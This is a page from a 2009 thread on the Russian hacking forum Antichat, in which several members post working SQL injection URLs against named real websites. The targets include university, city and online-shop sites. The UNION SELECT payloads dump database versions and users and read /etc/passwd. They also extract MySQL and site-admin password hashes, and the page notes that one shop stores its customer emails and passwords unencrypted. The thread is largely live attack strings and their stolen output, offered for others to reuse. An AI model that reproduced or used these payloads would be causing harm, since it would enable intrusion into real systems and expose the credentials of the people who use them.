ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7891  
Старый 18.02.2009, 14:19
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank = 7

Цитата:
http://www.mbl.edu/marine_org/flescher/flescher.php?func=detail&id=206875871+union+select +concat_ws(0x3a,version(),user(),database()),2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52--

Database Version: 5.0.7-beta-standard
Database name: flescher
User name: root@hermes.mbl.edu


Цитата:
http://www.mbl.edu/marine_org/flescher/flescher.php?func=detail&id=206875871+union+select +concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52+from+mysql.user--
root : 475bf8887babd6b6


Читаем /etc/passwd

Цитата:
http://www.mbl.edu/marine_org/flescher/flescher.php?func=detail&id=206875871+UNION+SELECT +CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764),0 x3a),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
 
Ответить с цитированием

  #7892  
Старый 18.02.2009, 14:24
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

ci.bartlesville.ok.us - PR1 =\
Код:
http://www.ci.bartlesville.ok.us/page.php?page=-1183+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
DB_Ver: 4.0.27-max-log
DB_User: pendergraphics@68.178.254.114
DB: pendergraphics
Дальше поверхностно глянул ничего интересного =((
 
Ответить с цитированием

  #7893  
Старый 18.02.2009, 14:37
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://dvaction.northwestern.edu/categorybrowse.php?id=4798798654+union+select+1,2, 3,4,concat_ws(0x3a,version(),user(),database())--
Database Version: 5.0.27
Database name: dvaction
User name: ro@localhost
 
Ответить с цитированием

  #7894  
Старый 18.02.2009, 14:54
Аватар для molotovkeyt
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию

Замечательная студия невероятного дизайна )):
http://www.avestudio.ru/?pg=7&id=49&iDsub=48
Практически все сайты с дырявым мускулем. Дерзайте.
 
Ответить с цитированием

  #7895  
Старый 18.02.2009, 15:19
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank = 6

Цитата:
http://www.howtostudy.org/resources_subject.php?id=28098097096550+union+sele ct+1,concat_ws(0x3a,version(),user(),database()),3--
4.1.22
studyskills@localhost
howtostudy


Шопы -) PR = 4

Цитата:
http://www.aromaticsinternational.com/search-results.php?nav=other&cat=3809809708976+union+sele ct+1,concat_ws(0x3a,version(),user(),database()),3 ,4,5,6--

Database Version: 5.0.32-Debian_7etch8-log
Database name: aromatics
User name: aromatics@localhost

Администраторы:

Цитата:
http://www.aromaticsinternational.com/search-results.php?nav=other&cat=3809809708976+UNION+SELE CT+1,CONCAT(0x3a,(SELECT+CONCAT(user_ID,0x3a,user_ name,0x3a,pass_word)+FROM+aromatics.admin_users+LI MIT+0,1),0x3a),3,4,5,6--
user_ID : user_name : pass_word

: 1 : corey : 3d01fb21c5a7b2995b4c0bc263d90784
: 3 : andrea : 478884f1d0e0c32d0a9a0f1a32ab1acb
: 5 : maria : a5647dd8e76d815833a0d25d29f74747
: 6 : alexander : c68763c0c7204310ef465cfd4d034441




Цитата:
http://www.cdsp.edu/news_deans.php?id=27987986650+union+select+1,2,con cat_ws(0x3a,version(),user(),database())--

4.1.22-log
vshields@localhost
webb_design

Последний раз редактировалось spherics; 18.02.2009 в 16:05..
 
Ответить с цитированием

  #7896  
Старый 18.02.2009, 16:04
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.f1links.com/list.php?id=36+union+select+1,2,user,4,pass,6,7,8,9,10,11,12,13,14+from+users--
 
Ответить с цитированием

www.tamasHYI.ro
  #7897  
Старый 18.02.2009, 16:13
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию www.tamasHYI.ro

http://www.tamashyi.ro/arte_martiale.php?ID=3+UNION+SELECT+1,2,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,Version(),Database(),Use r()),0x71),0x71),4



Database Version: 5.0.51a-community
Database name: tamashyi_tamashy
User name: tamashyi_tamashy@localhost
 
Ответить с цитированием

  #7898  
Старый 18.02.2009, 16:34
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank = 6

Цитата:
http://www.wscal.edu/bookstore/store/mp3_details.php?id=1373+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11--
4.0.27-standard
wmsem28_wmsem28@localhost
wmsem28_onlinestore


Цитата:
http://cip.gmu.edu/clib/detail.php?id=72738098097+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7--

4.0.13-log
lawAdmin@localhost
cipp
 
Ответить с цитированием

  #7899  
Старый 18.02.2009, 18:31
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

icgadget.ca
Код:
http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4/*
DB_Ver:4.1.22-standard-log
DB:icgadget_icgadget
DB_User:icgadget_icgadge@localhost
Табличка с пользователями customers поля в ней:
email
password
пример запроса:
Код:
http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,email,password),4+from+customers+limit+0,1/*
пароли ничем не шифрованны =)

Последний раз редактировалось Kraneg; 18.02.2009 в 18:33..
 
Ответить с цитированием

  #7900  
Старый 18.02.2009, 19:09
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.pet-world.ro/h_produs.php?kid=113&pid=-111+UNION+SELECT+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6--




Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: resocom_petworld
User name: resocom_petworld@supremecenter49.com
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ